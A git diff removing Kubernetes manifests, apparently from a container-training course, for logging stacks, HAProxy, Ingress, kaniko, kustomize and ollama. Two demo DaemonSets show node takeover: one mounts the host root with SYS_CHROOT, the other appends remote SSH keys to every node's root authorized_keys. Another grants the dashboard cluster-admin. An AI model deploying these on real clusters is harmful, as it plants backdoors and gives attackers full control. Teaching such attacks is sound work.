# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# node: ${NODE_NAME}
# hints.enabled: true
# hints.default_config:
# type: container
# paths:
# - /var/log/containers/*${data.kubernetes.container.id}.log
processors:
- add_cloud_metadata:
- add_host_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
hostNetwork: true
dnsPolicy: ClusterFirstWithHostNet
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat:7.5.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: demo-es-http
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
- name: varlog
mountPath: /var/log
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: varlog
hostPath:
path: /var/log
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: eck-demo
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
---

View File

@@ -1,17 +0,0 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
name: demo
spec:
version: 7.5.1
count: 1
elasticsearchRef:
name: demo
namespace: eck-demo
http:
service:
spec:
type: NodePort
tls:
selfSignedCertificate:
disabled: true

File diff suppressed because it is too large.

View File

@@ -1,176 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: fluentd
rules:
- apiGroups:
- ""
resources:
- pods
- namespaces
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: fluentd
roleRef:
kind: ClusterRole
name: fluentd
apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: fluentd
namespace: default
labels:
app: fluentd
spec:
selector:
matchLabels:
app: fluentd
template:
metadata:
labels:
app: fluentd
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
- name: FLUENT_ELASTICSEARCH_PORT
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
volumeMounts:
- name: varlog
mountPath: /var/log
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
terminationGracePeriodSeconds: 30
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
selector:
matchLabels:
app: elasticsearch
template:
metadata:
labels:
app: elasticsearch
spec:
containers:
- image: elasticsearch:5
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
labels:
app: elasticsearch
name: elasticsearch
namespace: default
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
selector:
matchLabels:
app: kibana
template:
metadata:
labels:
app: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
name: kibana
resources: {}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: kibana
name: kibana
namespace: default
spec:
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,97 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
selector:
matchLabels:
name: elasticsearch-operator
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,30 +0,0 @@
kind: Event
apiVersion: v1
metadata:
generateName: hello-
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
kind: Node
apiVersion: v1
name: kind-control-plane
# Note: the uid should be the Node name (not the uid of the Node).
# This might be specific to global objects.
uid: kind-control-plane
type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
component: thermal-probe
#host: node1
#reportingComponent: ""
#reportingInstance: ""

View File

@@ -1,36 +0,0 @@
kind: Event
apiVersion: v1
metadata:
# One convention is to use <objectname>.<timestamp>,
# where the timestamp is taken with a nanosecond
# precision and expressed in hexadecimal.
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
name: hello.1234567890
# The label doesn't serve any purpose, except making
# it easier to identify or delete that specific event.
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
### These 5 lines should be updated to refer to an object.
### Make sure to put the correct "uid", because it is what
### "kubectl describe" is using to gather relevant events.
#apiVersion: v1
#kind: Pod
#name: magic-bean
#namespace: blue
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""
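# One possible way to look up that uid, reusing the hypothetical pod
# name and namespace from the commented example above:
#   kubectl get pod magic-bean --namespace blue \
#     --output "jsonpath={.metadata.uid}"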

View File

@@ -1,170 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,14 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hackthecluster
spec:
selector:
matchLabels:
app: hackthecluster
template:
metadata:
labels:
app: hackthecluster
spec:
volumes:
- name: slash
hostPath:
path: /
tolerations:
- effect: NoSchedule
operator: Exists
containers:
- name: alpine
image: alpine
volumeMounts:
- name: slash
mountPath: /hostfs
command:
- sleep
- infinity
securityContext:
#privileged: true
capabilities:
add:
- SYS_CHROOT
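# What this demonstrates: mounting the node's root filesystem at
# /hostfs and granting SYS_CHROOT is enough to take over the node,
# for example with:
#   kubectl exec -ti <pod> -- chroot /hostfs sh
# (The commented-out "privileged: true" achieves the same result with
# even fewer restrictions.)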

View File

@@ -1,33 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx
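# What this demonstrates: a DaemonSet with a hostPath mount of /root
# and a blanket toleration runs on every node (control plane included)
# and appends an attacker's public SSH keys to each node's
# /root/.ssh/authorized_keys; in other words, full cluster takeover
# from a single "kubectl apply".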

View File

@@ -1,16 +0,0 @@
global
daemon
defaults
mode tcp
timeout connect 5s
timeout client 50s
timeout server 50s
listen very-basic-load-balancer
bind *:80
server blue color.blue.svc:80
server green color.green.svc:80
### Note: the services above must exist,
### otherwise HAproxy won't start.
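### One possible way to load this configuration into the cluster,
### assuming this file is saved as haproxy.cfg (the Pod in the next
### file mounts a ConfigMap named "haproxy" at the path where HAproxy
### expects its configuration):
###   kubectl create configmap haproxy --from-file=haproxy.cfg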

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy:1
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,29 +0,0 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2
metadata:
name: rng
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: rng
minReplicas: 1
maxReplicas: 20
behavior:
scaleUp:
stabilizationWindowSeconds: 60
scaleDown:
stabilizationWindowSeconds: 180
metrics:
- type: Object
object:
describedObject:
apiVersion: v1
kind: Service
name: httplat
metric:
name: httplat_latency_seconds
target:
type: Value
value: 0.1
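# Note: this "Object" metric assumes that an adapter implementing the
# custom metrics API (for instance prometheus-adapter) exposes a metric
# named httplat_latency_seconds on the httplat Service. The autoscaler
# then adds rng replicas (up to 20) while the observed latency stays
# above the 0.1s target, and scales back down after the 180-second
# stabilization window.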

View File

@@ -1,20 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: whatever
port:
number: 1234

View File

@@ -1,17 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234
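# Note: the networking.k8s.io/v1beta1 Ingress API was removed in
# Kubernetes 1.22, so this variant only works on older clusters;
# current clusters should use the networking.k8s.io/v1 manifest above.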

View File

@@ -1 +0,0 @@
ingress-v1beta1.yaml

View File

@@ -1,10 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone https://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace
  emptyDir: {}
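# Note: kaniko builds the image entirely in userspace, without a Docker
# daemon or host socket. The --insecure flag and the registry:5000
# destination assume an in-cluster registry Service named "registry",
# reachable on port 5000 over plain HTTP.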

View File

@@ -1,12 +0,0 @@
# This removes the haproxy Deployment.
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
patches:
- patch: |-
$patch: delete
kind: Deployment
apiVersion: apps/v1
metadata:
name: haproxy

View File

@@ -1,14 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.
components:
- setup
- cleanup
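# A minimal sketch of what the companion "setup" component could look
# like (hypothetical, since only the "cleanup" component appears in
# this diff); it would live in setup/kustomization.yaml and create the
# haproxy Deployment that "cleanup" later deletes:
#
#   apiVersion: kustomize.config.k8s.io/v1alpha1
#   kind: Component
#   resources:
#   - haproxy.yaml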

View File

@@ -1,20 +0,0 @@
global
#log stdout format raw local0
#daemon
maxconn 32
defaults
#log global
timeout client 1h
timeout connect 1h
timeout server 1h
mode http
option abortonclose
frontend metrics
bind :9000
http-request use-service prometheus-exporter
frontend ollama_frontend
bind :8000
default_backend ollama_backend
maxconn 16
backend ollama_backend
server ollama_server localhost:11434 check

View File

@@ -1,39 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: haproxy
name: haproxy
spec:
selector:
matchLabels:
app: haproxy
template:
metadata:
labels:
app: haproxy
spec:
volumes:
- name: haproxy
configMap:
name: haproxy
containers:
- image: haproxy:3.0
name: haproxy
volumeMounts:
- name: haproxy
mountPath: /usr/local/etc/haproxy
readinessProbe:
httpGet:
port: 9000
ports:
- name: haproxy
containerPort: 8000
- name: metrics
containerPort: 9000
resources:
requests:
cpu: 0.05
limits:
cpu: 1

View File

@@ -1,75 +0,0 @@
# This adds a sidecar to the ollama Deployment, by taking
# the pod template and volumes from the haproxy Deployment.
# The idea is to allow running ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separately, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed appending or
# merging lists in "replacements"; but it doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed performing
# a strategic merge using a fieldPath as the source, because
# we could merge both the containers and the volumes in a
# single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable, so we decided not to do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# a restartPolicy=Always).
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component
resources:
- haproxy.yaml
configMapGenerator:
- name: haproxy
files:
- haproxy.cfg
replacements:
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.volumes.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.volumes.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy]
targets:
- select:
kind: Deployment
name: ollama
fieldPaths:
- spec.template.spec.containers.[name=haproxy]
options:
create: true
- source:
kind: Deployment
name: haproxy
fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
targets:
- select:
kind: Service
name: ollama
fieldPaths:
- spec.ports.[name=11434].targetPort
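# Net effect of the three replacements above, sketched: the ollama
# Deployment gains the haproxy volume and container copied from the
# haproxy Deployment, and the ollama Service's targetPort is rewired
# from 11434 to haproxy's "haproxy" port (8000). Traffic then flows:
#   client -> Service ollama:11434 -> haproxy :8000 -> localhost:11434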

View File

@@ -1,34 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 2
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- port: 80
selector:
app: blue

View File

@@ -1,94 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml
buildMetadata:
# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel
# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
# ref (tag, branch...) it was.
- originAnnotations
# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations
# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so that basically, if the ConfigMap is edited, any workload
# using that ConfigMap will automatically do a rolling update.
configMapGenerator:
- name: ollama
literals:
- "model=gemma3:270m"
- "prompt=If you visit Paris, I suggest that you"
- "queue=4"
patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example below adds CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
apiVersion: apps/v1
kind: Deployment
metadata:
name: ollama
spec:
template:
spec:
containers:
- name: ollama
resources:
requests:
cpu: 1
limits:
cpu: 2
# This would have the same effect, with one small difference:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
# kind: Deployment
# name: ollama
# patch: |
# - op: add
# path: /spec/template/spec/containers/0/resources
# value:
# requests:
# cpu: 1
# limits:
# cpu: 2
# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key difference, though:
# - a "base" will be evaluated in isolation: it will
# generate+transform some resources, then these resources
# will be included in the main Kustomization;
# - a "component" has access to all the resources that
# have been generated by the main Kustomization, which
# means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar
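# One possible way to render and inspect the output of this
# Kustomization, from the directory containing this file:
#   kubectl kustomize .
# or, with a standalone kustomize binary:
#   kustomize build . | kubectl apply -f -
# (The buildMetadata options above may require a recent kustomize.)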

View File

@@ -1,73 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: ollama
name: ollama
spec:
selector:
matchLabels:
app: ollama
template:
metadata:
labels:
app: ollama
spec:
volumes:
- name: ollama
hostPath:
path: /opt/ollama
type: DirectoryOrCreate
containers:
- image: ollama/ollama
name: ollama
env:
- name: OLLAMA_MAX_QUEUE
valueFrom:
configMapKeyRef:
name: ollama
key: queue
- name: MODEL
valueFrom:
configMapKeyRef:
name: ollama
key: model
volumeMounts:
- name: ollama
mountPath: /root/.ollama
lifecycle:
postStart:
exec:
command:
- /bin/sh
- -c
- ollama pull $MODEL
livenessProbe:
httpGet:
port: 11434
readinessProbe:
exec:
command:
- /bin/sh
- -c
- ollama show $MODEL
ports:
- name: ollama
containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
labels:
app: ollama
name: ollama
spec:
ports:
- name: "11434"
port: 11434
protocol: TCP
targetPort: 11434
selector:
app: ollama
type: ClusterIP

View File

@@ -1,5 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis

View File

@@ -1,13 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
apiVersion: builtin
kind: PrefixSuffixTransformer
metadata:
name: use-ghcr-io
prefix: ghcr.io/
fieldSpecs:
- path: spec/template/spec/containers/image
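# Sketch of the effect: with the transformer above, an image reference
# like
#   image: dockercoins/hasher:v0.1
# in microservices.yaml is rewritten to
#   image: ghcr.io/dockercoins/hasher:v0.1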

View File

@@ -1,125 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,4 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- redis.yaml

View File

@@ -1,35 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
